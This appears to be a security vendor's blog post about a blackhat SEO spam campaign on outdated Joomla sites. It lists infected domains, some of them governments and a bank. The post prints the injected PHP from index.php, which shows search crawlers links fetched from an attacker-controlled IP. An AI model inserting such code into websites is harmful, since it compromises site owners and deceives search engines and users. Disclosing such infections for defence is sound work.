Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14).

This is how they show up in our scanner:

They all had the following code added to their index.php file to contact 188.72.201.11 and 209.160.33.108 to retrieve the list of links to show up:

if (preg_match(‘/live|msn|yahoo|Google|ask|aol|bot|google/’, $_SERVER[‘HTTP_USER_AGENT’])) {
$get = “http://188.72.201.11/bots.php?host=”.$_SERVER[‘HTTP_HOST’];
if (function_exists(“curl_init”)) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $get);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
echo $out;
} else {
$out = file_get_contents($get);
echo $out;
}

These are some of the sites we identified so far: (some .govs, some small banks, many russian, etc).

www.grameen.com – Grameen Bank
corteconstitucional.gov.ec – Ecuador .gov
www.lalibertad.gob.ec – Ecuador .gov
cce.gov.ec – Ecuador .gov
www.image-live.com
www.chic-association.com
morpeh.org
www.kdv-de-kangoeroe.nl
www.stm.pt
www.tocyprus.org
www.iimbaa.org
www.victrolacoffee.com
www.hhcag.org.uk
www.glenchem.com
www.buddies.pl
www.weddings-in-prague.com
sollat.eng.usm.my
www.boostconference.org

If you are using Joomla, make sure it is upgraded to avoid getting hacked. You can also check if your site is infected by scanning it in here: http://sitecheck.sucuri.net


Having security problems? Malware? Blacklisted? We can fix it for you: http://sucuri.net

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.